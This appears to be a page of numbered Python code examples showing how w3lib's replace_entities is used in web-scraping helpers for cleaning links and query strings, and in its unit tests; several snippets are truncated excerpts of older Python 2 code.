    # just checking if a string is in text); this is a quick fail-fast
    # path that should work for most pages.
    if 'fragment' not in text:
        return False
    if 'content' not in text:
        return False

    text = html.remove_tags_with_content(text, ('script', 'noscript'))
    text = html.replace_entities(text)
    text = html.remove_comments(text)
    return _ajax_crawlable_re.search(text) is not None
Example #42
import urllib
import urlparse
from urlparse import urljoin
from w3lib.html import replace_entities


def clean_link(link_text):

    return link_text.strip("\t\r\n '\"")

# return the first item of the list, or None if it is empty
list_first_item = lambda x:x[0] if x else None 

# join the link with the base url, after stripping whitespace/punctuation and replacing entities
clean_url = lambda base_url, u, response_encoding: urljoin(base_url, replace_entities(clean_link(u.decode(response_encoding))))


# get a query-string parameter
def get_query(url, key):
    bits = list(urlparse.urlparse(url))
    query = urlparse.parse_qs(bits[4])

    return query[key][0]
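
A quick usage sketch for get_query (parse_qs maps each key to a list of values, so [0] takes the first; the url is made up):

assert get_query('http://example.com/page?id=42&tag=py', 'id') == '42'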


# set query-string parameters
def set_query(url, **args):
    bits = list(urlparse.urlparse(url))
    query = urlparse.parse_qs(bits[4])
Example #43
def _cleanup(value):
    return " ".join(replace_entities(replace_tags(value)).strip().split())
Example #44
def remove_entities(text, encoding):
    return replace_entities(text, keep=_ENTITIES_TO_KEEP, encoding=encoding)
    """
    if type(arg) is types.ListType:
        return list(set(arg))
    elif type(arg) is types.TupleType:
        return tuple(set(arg))

    return arg


def clean_link(link_text):
    """
        Remove leading and trailing whitespace and punctuation
    """
    return link_text.strip("\t\r\n '\"")


clean_url = lambda base_url, u, response_encoding: urljoin(
    base_url, replace_entities(text=clean_link(u), encoding=response_encoding)
)
#
# clean_url = lambda base_url, u, response_encoding: urljoin(base_url,
#                                                            replace_entities(
#                                                                text=clean_link(u.decode(response_encoding, 'ignore')),
#                                                                encoding=response_encoding)
# )

"""
    remove leading and trailing whitespace, punctuation and entities from the given text,
    then join the base_url with the extracted link
"""
Example #46
#!/usr/bin/python
# -*- coding: utf-8 -*-

# __author__ 'Hao LI'

import types

from w3lib.html import replace_entities
from urlparse import urlparse, urljoin

NULL = [None, 'null']

prefix = "www.bbc"

new_prefix = "http://www.bbc.com"

def clean_link(link_text):
    """
        Remove leading and trailing whitespace and punctuation
    """

    return link_text.strip("\t\r\n '\"")

clean_url = lambda base_url,u,response_encoding: urljoin(base_url,
                                                         replace_entities(clean_link(u.decode(response_encoding))))
"""
    remove leading and trailing whitespace, punctuation and entities from the given text,
    then join the base_url with the extracted link
"""
Example #47
 def test_returns_unicode(self):
     # make sure it always returns unicode
     assert isinstance(replace_entities(b'no entities'), six.text_type)
     assert isinstance(replace_entities(b'Price: &pound;100!'),  six.text_type)
     assert isinstance(replace_entities(u'no entities'), six.text_type)
     assert isinstance(replace_entities(u'Price: &pound;100!'),  six.text_type)
Example #48
 def test_encoding(self):
     self.assertEqual(replace_entities(b'x\x99&#153;&#8482;y', encoding='cp1252'), \
                      u'x\u2122\u2122\u2122y')
Example #49
 def test_browser_hack(self):
     # check browser hack for numeric character references in the 80-9F range
     self.assertEqual(replace_entities('x&#153;y', encoding='cp1252'), u'x\u2122y')
     self.assertEqual(replace_entities('x&#x99;y', encoding='cp1252'), u'x\u2122y')
Example #50
 def test_keep_entities(self):
     # keep some entities
     self.assertEqual(replace_entities(b'<b>Low &lt; High &amp; Medium &pound; six</b>', keep=['lt', 'amp']),
                      u'<b>Low &lt; High &amp; Medium \xa3 six</b>')
     self.assertEqual(replace_entities(u'<b>Low &lt; High &amp; Medium &pound; six</b>', keep=[u'lt', u'amp']),
                      u'<b>Low &lt; High &amp; Medium \xa3 six</b>')